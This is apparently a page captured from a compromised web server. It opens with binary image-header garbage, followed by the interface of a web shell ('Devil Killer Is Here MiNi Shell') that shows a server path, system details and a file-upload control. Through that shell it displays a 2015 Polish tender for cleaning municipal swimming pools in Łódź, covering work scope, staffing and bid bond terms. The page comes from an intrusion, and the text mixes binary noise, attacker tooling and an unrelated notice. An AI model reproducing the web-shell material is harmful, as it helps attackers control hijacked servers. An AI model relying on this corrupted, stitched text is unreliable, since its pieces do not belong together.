JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151026/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151026/156145-N-2015.html

<p class="kh_header"><b>Łódź: Świadczenie usług utrzymania czystości i higieny w obiektach pływalni MOSiR w Łodzi</b><br>
<b>Numer ogłoszenia: 156145 - 2015; data zamieszczenia: 26.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Ks. Skorupki 21, 90-532 Łódź, woj. łódzkie, tel. 42 27 21 417, faks 42 6367980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług utrzymania czystości i higieny w obiektach pływalni MOSiR w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Świadczenie usług utrzymania czystości i higieny w obiektach pływalni MOSiR w Łodzi, według poniższego opisu:

Utrzymanie czystości na Pływalni Wodny Raj przy ul. Wiernej Rzeki 2 w części dotyczącej pomieszczeń basenowych, pomieszczeń usługowych, pomieszczeń sauny a także utrzymanie czystości, higieny i porządku na Pływalni Odkrytej Wodny Raj i Pływalni odkrytej Promienistych przy ul. Głowackiego 10/12.
Świadczenie usługi odbywać się będzie na terenie pływalni krytej Wodny Raj w okresie 12 miesięcy, na pływalniach odkrytych Wodny Raj w okresie od 15 maja do 4 września 2016 r. i Promienistych w okresie od 25 maja do 4 września 2016 r. 
Utrzymanie czystości musi odbywać się zgodnie z przepisami sanitarno-epidemiologicznymi. 

1.	Opis obiektów

1)	Budynek pływalni krytej Wodny Raj - łączna powierzchnia 6.522,20 m2
a)	Parter: 
	- terakota - 1.573,60 m2,
	- wykładzina PCV - 14,60 m2,
	- wykładzina dywanowa - 15,20 m2,
	- glazura ścienna - 3.925,00 m2,
b)	Piętro:
	- terakota - 165,30 m2,
	- wykładzina PCV -35,50 m2,
	- glazura ścienna - 443,00 m2,
	- szklane powierzchnie - 350 m2.

2)	pływalnia odkryta Wodny Raj - łączna powierzchnia 323,80 m2
a)	Pomieszczenia:
-	polbruk - 1901,90 m2
-	lastriko szlifowane - 29,30 m2
-	ceramika - 49,40 m2
-	luksfery - 27,30 m2
-	glazura - 102,50 m2
-	niecki basenu - 611,40 m2

3)	pływalnia przy ul. Głowackiego - łączna powierzchnia 392 m2
a)	Pomieszczenia:
- ceramika - 290 m2
- szklane powierzchnie - 54 m2
- linoleum - 18 m2
- niecki prysznicowe - zewnętrzne - 30 m2

2.	Zakres usług:
1)	Budynek pływalni krytej Wodny Raj usługi wykonywane przez okres 12 miesięcy

a)	Pomieszczenia basenowe:
- mycie i dezynfekcja plaż wokół basenów - codziennie
- mycie i dezynfekcja ścian pokrytych płytkami ceramicznymi - codziennie
- mycie dna niecki basenu sportowego - 2 razy w roku, basenu rekreacyjnego i basenu zewnętrzno-wewnętrznego - minimum 4 razy w roku, pozostałe zbiorniki znajdujące się na hali - nie rzadziej niż 1 raz na tydzień (w przypadkach awaryjnych częstotliwość mycia zbiorników może ulec zmianie)
- mycie wewnętrznych ścian niecek do wysokości lustra wody - codziennie
- czyszczenie ścian zbiorników (niecek) - 2 razy w tygodniu
- mycie kratek zakrywających kanały rynien przelewowych - codziennie, dezynfekcja - 2 razy w tygodniu,
- mycie kanałów rynien przelewowych - codziennie, dezynfekcja - 2 razy w tygodniu
- mycie i dezynfekcja wyposażenia basenu (zjeżdżalnie) - wg potrzeb, nie rzadziej niż 2 razy w tygodniu, schody prowadzące na wieżyczkę zjeżdżalni żółtej i zielonej - codziennie
- mycie elementów metalowych poręczy i balustrad, parapetów, murków - codziennie
- mycie przeszklonych powierzchni okien i drzwi - wg potrzeb.

UWAGA 
W przypadkach awarii urządzeń mogą nastąpić zmiany częstotliwości wykonywania prac, które będą uzgadniane z osobą upoważnioną przez Zamawiającego pisemnie.

b)	Pomieszczenia usługowe:
- hol z szatnią i kasami
- szatnie basenowe
- toalety oraz prysznice
- pomieszczenia gospodarcze
- pomieszczenia biurowe
- ciągi komunikacyjne

W pomieszczeniach wymienionych w literze b) wymagane jest stałe utrzymanie czystości w zakresie:

- mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, natryski, miski klozetowe, pisuary, itd.) 
- mycie i dezynfekcja kabin przebieralni
- mycie i dezynfekcja powierzchni podłogowych
- mycie ścian pokrytych płytkami ceramicznymi,
- opróżnianie koszy i wymiana worków foliowych
- mycie i dezynfekcja koszy na śmieci z zewnątrz i wewnątrz
- mycie i dezynfekcja pojemników na mydło
- uzupełnianie mydła w płynie i ręczników jednorazowych
- zaopatrywanie toalet w papier toaletowy
- mycie luster
- mycie i dezynfekcja suszarek do włosów w przebieralniach
- mycie ławek w przebieralni i holu
- mycie szafek ubraniowych w szatniach
- mycie elementów metalowych poręczy, balustrad
- mycie parapetów, murków itp.
- mycie nogomyj 

Zakres wymieniony w literze b) powyżej należy wykonywać wielokrotnie w ciągu dnia wg potrzeb.



c)	Pomieszczenia sauny wraz z infrastrukturą:
- mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, natryski, miski klozetowe, pisuary, itd.)
- mycie i dezynfekcja powierzchni podłogowych
- mycie ścian pokrytych płytkami ceramicznymi
- mycie i dezynfekcja sprzętu
- mycie elementów metalowych poręczy 
- mycie parapetów, murków, itp.

W pomieszczeniach sauny wymagane jest stałe utrzymanie czystości, a czynności wymienione w literze c) powyżej należy wykonywać wielokrotnie w ciągu dnia wg potrzeb.

d)	Dodatkowe prace
- sprzątanie podbasenia i przyległych pomieszczeń - raz na kwartał w obecności konserwatora,
- czyszczenie kratek wentylacyjnych - raz w miesiącu,
- mycie szyb, urządzeń, powierzchni wymagających pracy na wysokości,
- mycie okien wewnętrznych,
- usuwanie nieczystości z wody basenowej i dna niecki na polecenie osoby kierującej pływalnią Wodny Raj.

2)	pływalnia odkryta Wodny Raj usługi wykonywane w sezonie letnim określonym zarządzeniem Dyrektora MOSiR 

a)	Pomieszczenia kąpieliska odkrytego.
- mycie i dezynfekcja ścian pokrytych płytkami ceramicznymi - codziennie,
- mycie elementów metalowych poręczy i balustrad, parapetów, murków oraz kolumn natryskowych - 2 razy w tygodniu,
- mycie przeszklonych powierzchni okien i drzwi oraz luksferów - wg potrzeb,
- mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, natryski, miski klozetowe, pisuary, itd.) - codziennie,
- mycie kabin przebieralni - codziennie, dezynfekcja - 2 razy w tygodniu, 
- mycie powierzchni podłogowych - codziennie, dezynfekcja - 2 razy w tygodniu,
- opróżnianie koszy i wymiana worków foliowych - codziennie według potrzeb,
- mycie i dezynfekcja koszy na śmieci z zewnątrz i wewnątrz - 2 razy w tygodniu,
- mycie i dezynfekcja pojemników na mydło, uzupełnianie mydła w płynie, zaopatrywanie toalet w papier toaletowy - codziennie według potrzeb,
- mycie luster - codziennie,
- mycie szafek ubraniowych w szatniach - według potrzeb,
- mycie linii brzegowej (ścian wewnętrznych do wysokości lustra wody) w niecce basenu odkrytego - codziennie,
- mycie i dezynfekcja plaż wokół basenów - codziennie,
- mycie kratek zakrywających kanały rynien przelewowych - codziennie, dezynfekcja - 2 razy w tygodniu,
- mycie kanałów rynien przelewowych - codziennie, dezynfekcja - 2 razy w tygodniu,
- mycie zjeżdżalni, nogomyj, schodów - codziennie,
- mycie elementów metalowych poręczy i balustrad, murków - codziennie,
- przygotowanie terenu utwardzonego (kostka brukowa - zmycie całej powierzchni wodą, usunięcie piasku naniesionego w czasie mycia i eksploatacji basenu),



b)	Przygotowanie kąpieliska (basenu odkrytego) do sezonu letniego.
- mycie folii po okresie zimowym w celu przygotowania niecki do sezonu letniego w terminie uzgodnionym z osobą upoważnioną przez Zamawiającego,
- mycie folii po sezonie letnim w celu przygotowania niecki basenu do okresu zimowego w terminie uzgodnionym z osobą upoważnioną przez Zamawiającego,
- mycie krat przelewowych zakrywających koryta przelewowe po okresie zimowym,
- mycie zjeżdżalni, nogomyj, schodów,
- mycie urządzeń-elementów atrakcji przed zamontowaniem,
- przygotowanie terenu utwardzonego (kostka brukowa):
  -	usunięcie wszelkich porostów i mchów ze szczelin kostki brukowej,mycie kostki brukowej,
  -	zmycie całej powierzchni terenu utwardzonego wodą,
  -	usunięcie piasku naniesionego w czasie mycia,

c)	Zaopatrzenie w środki czystości
Bieżące zaopatrzenie węzłów sanitarnych w środki czystości:
- mydło w płynie, 
- środki zapachowe i dezynfekcyjne, 
- papier toaletowy i ręczniki papierowe 
w ilościach zapewniających systematyczne uzupełnianie dozowników w w/w środki.

d)	Terminy wykonania poszczególnych prac:
- Sprzątanie odbywa się przez 7 dni w tygodniu.
Obiekt pływalni Wodny Raj otwarty jest dla użytkowników:
-	Pływalnia kryta:
od poniedziałku do piątku w godzinach 6.00 - 22.00
w soboty w godzinach 8.00 - 22.00
w niedziele i święta w godzinach 8.00 - 21.00
-	Pływalnia odkryta: 
od poniedziałku do niedzieli w godzinach od 9.00 - 18.00

e)	Liczba pracowników:
-	w ciągu dnia (basen czynny - sprzątanie bieżące): 	zmiana ranna - minimum 2 osoby
-	zmiana popołudniowa - minimum 2 osoby
-	w nocy (basen nieczynny - sprzątanie całego basenu) minimum 3 osoby

W ramach świadczonej usługi wykonawca musi posiadać własne materiały (środki myjąco-dezynfekujace, odświeżacze powietrza, neutralizatory powietrza biodegradowalne) oraz narzędzia i sprzęt mechaniczny do wykonywania zamówienia.
Niedopuszczalne jest modyfikowanie stosowanych środków czyszczących niezgodne z instrukcją ich użytkowania (np. poprzez ich rozcieńczanie).

3)	pływalnia odkryta przy ul Głowackiego usługi wykonywane w sezonie letnim określonym zarządzeniem Dyrektora MOSiR 

a)	Mycie niecki basenowej i brodzika przed sezonem letnim 
b)	Pomieszczenia kąpieliska odkrytego.
- mycie i dezynfekcja ścian pokrytych płytkami ceramicznymi - codziennie, 
- mycie elementów metalowych poręczy i balustrad, parapetów, murków oraz kolumn natryskowych - minimum 2 razy w tygodniu,
- mycie przeszklonych powierzchni okien i drzwi - wg potrzeb,
- mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, natryski, miski klozetowe, pisuary, itd.) - na bieżąco przy dużej frekwencji, codziennie w ramach dyżurów,
- mycie kabin przebieralni - codziennie, dezynfekcja - minimum 2 razy w tygodniu, 
- mycie powierzchni podłogowych - codziennie, dezynfekcja - 2 razy w tygodniu,
- opróżnianie koszy i wymiana worków foliowych - codziennie i według potrzeb,
- mycie i dezynfekcja koszy na śmieci z zewnątrz i wewnątrz - 2 razy w tygodniu,
- wynoszenie i wymiana pełnych worków na śmieci - według potrzeb,
- mycie i dezynfekcja pojemników na mydło, uzupełnianie mydła w płynie, zaopatrywanie toalet w papier toaletowy oraz ręczniki jednorazowe - codziennie według potrzeb,
- mycie luster - codziennie,
c)	Zaopatrzenie w środki czystości
Bieżące zaopatrzenie węzłów sanitarnych w środki czystości (mydło w płynie, środki zapachowe i dezynfekcyjne), papier toaletowy i ręczniki papierowe w ilościach zapewniających ich bieżące użytkowanie oraz systematyczne uzupełnianie dozowników w w/w środki.
d)	Terminy wykonania poszczególnych prac:
Sprzątanie według określonych powyżej zakresów prac odbywa się 7 dni w tygodniu. 
Obiekt pływalni odkrytej przy ul. Głowackiego otwarty jest dla użytkowników: 
od poniedziałku do niedzieli w godzinach od 10.00 - 18.00
Godziny funkcjonowania pływalni mogą ulec zmianie.

e)	Liczba pracowników: minimum 1 osoba
Godziny pracy od godziny 10 do godziny 20 (7 dni w tygodniu).
Czas oraz godziny sprzątania obiektów należy określić w harmonogramie sprzątania stosownie do podanego zakresu czynności, w uzgodnieniu z osobą upoważnioną przez Zamawiającego.
W przypadku przerw w pracy obiektu, spowodowanych nieprzewidzianymi awariami lub okresem świątecznym, harmonogramy mogą ulec zmianie i zostaną przekształcone w jednozmianowe.
W ramach świadczonej usługi wykonawca musi posiadać własne materiały (środki myjaco-dezynfekujace, odświeżacze powietrza, neutralizatory powietrza biodegradowalne) oraz narzędzia i sprzęt mechaniczny do wykonywania zamówienia.
Niedopuszczalne jest modyfikowanie stosowanych środków czyszczących niezgodne z instrukcją ich użytkowania (np. poprzez ich rozcieńczanie)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości do 50 % zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1.	Zamawiający zgodnie z art. 45 ustawy Pzp żąda od Wykonawcy wniesienia wadium w wysokości: 5.000,00 PLN (słownie: pięć tysięcy złotych 00/100 PLN),
8.2.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku formach wymienionych w art. 45 ust. 6 ustawy Pzp, tj.:
8.2.1.	pieniądzu,
8.2.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
8.2.3.	gwarancjach bankowych,
8.2.4.	gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r., poz. 1804 jt.).
8.3.	Wadium wnoszone w pieniądzu winno wpłynąć na konto Zamawiającego przed upływem terminu składania ofert. Wpłaty pieniężnej należy dokonać przelewem na konto Zamawiającego nr:
Bank: Getin Noble Bank S.A.	Nr: 37 1560 0013 2027 1935 0505 0002 
w tytule przelewu powołując się na nr referencyjny postępowania 30/15/PN
8.4.	Jeśli wadium zostało wniesione w pieniądzu to zaleca się, aby oryginał lub kserokopia poświadczona za zgodność z oryginałem dowodu wniesienia wadium (dokonania przelewu bankowego) załączono do oferty.
8.5.	Jeśli wadium zostało wniesione w innej formie niż w pieniądzu to do oferty należy załączyć kserokopię poświadczoną za zgodność z oryginałem, natomiast oryginał należy załączyć do oferty w sposób uniemożliwiający jego zaginięcie, pozwalający jednak na jego zwrot bez dekompletowania oferty - oryginał nie może być na trwałe zespolony z ofertą. W przypadku niezastosowania się do powyższego zwrot oryginału będzie niemożliwy.
8.6.	W przypadku składania przez Wykonawcę wadium w formie poręczenia lub gwarancji, dokumenty te powinny być sporządzone zgodnie z obowiązującym prawem i zawierać co najmniej:
8.6.1.	nazwę dającego zlecenie (Wykonawcy), beneficjenta poręczenia/gwarancji (Zamawiającego), poręczyciela/gwaranta, oraz wskazanie ich siedzib,
8.6.2.	określenie wierzytelności, która ma być zabezpieczona poręczeniem/ gwarancją,
8.6.3.	kwotę wadium,
8.6.4.	termin ważności poręczenia/gwarancji - nie krótszy niż termin związania ofertą,
8.6.5.	zobowiązanie poręczyciela/gwaranta do zapłacenia kwoty wadium bezwarunkowo na pierwsze pisemne żądanie Zamawiającego w sytuacji, jeżeli Wykonawca:
8.6.5.1.	w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Pzp, lub informacji o tym, że nie należy do grupy kapitałowej nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Pzp, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
8.6.5.2.	 którego oferta została wybrana:
8.6.5.2.1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
8.6.5.2.2.	nie wniósł zabezpieczenia należytego wykonania umowy;
8.6.5.2.3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.7.	W przypadku składania przez Wykonawcę wadium w formie poręczenia lub gwarancji, Zamawiający nie uzna dokumentów, które nie spełniają wymagań, o których mowa w pkt. 8.6 SIWZ.
8.8.	Wykonawca, który nie wniesie wadium zostanie przez Zamawiającego wykluczony na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
8.9.	Zamawiający zatrzyma wadium, lub dokona jego zwrotu na zasadach określonych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować, że w ciągu ostatnich 3 lat kalendarzowych (poprzedzających dzień złożenia oferty), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał, co najmniej jedną (1) główną usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. 1 usługę sprzątania, trwającą, co najmniej 12 m-cy, w ramach jednego kontraktu, w obiektach krytej pływalni udowadniając brak nałożenia kar umownych za złe wykonanie usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować minimum 1 sztuką automatu szorująco - zbierającego, minimum 1 sztuką opryskiwacza np. typu SOLO do używania środków do dezynfekcji, minimum jedną sztuką suszarki wolnostojącej na mopy, minimum jedną sztuką wieszaka na miotły, mopy, minimum dwiema sztukami wyskalowanych pojemników do sporządzania roztworów, minimum jedną sztuką pralki, minimum jedną sztuką odkurzacza biurowego, minimum jedną sztuką drabinki przenośnej z podestem lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia takiego sprzętu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje minimum 7 (siedmioma) osobami, w tym co najmniej 1 (jedną) osobą z badaniami uprawniającymi do pracy na wysokości, wyznaczonych do realizacji niniejszego zamówienia, z których każda posiada sześciomiesięczny staż pracy, polegający na sprzątaniu w obiektach krytej pływalni (lub placówkach o podwyższonym rygorze sanitarno - higienicznym, np. szpitale) oraz przeszkolenie z zakresu zasad eksploatacji basenów, a także wymagań sanitarnych i przeciwepidemicznych, obowiązujących na basenach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

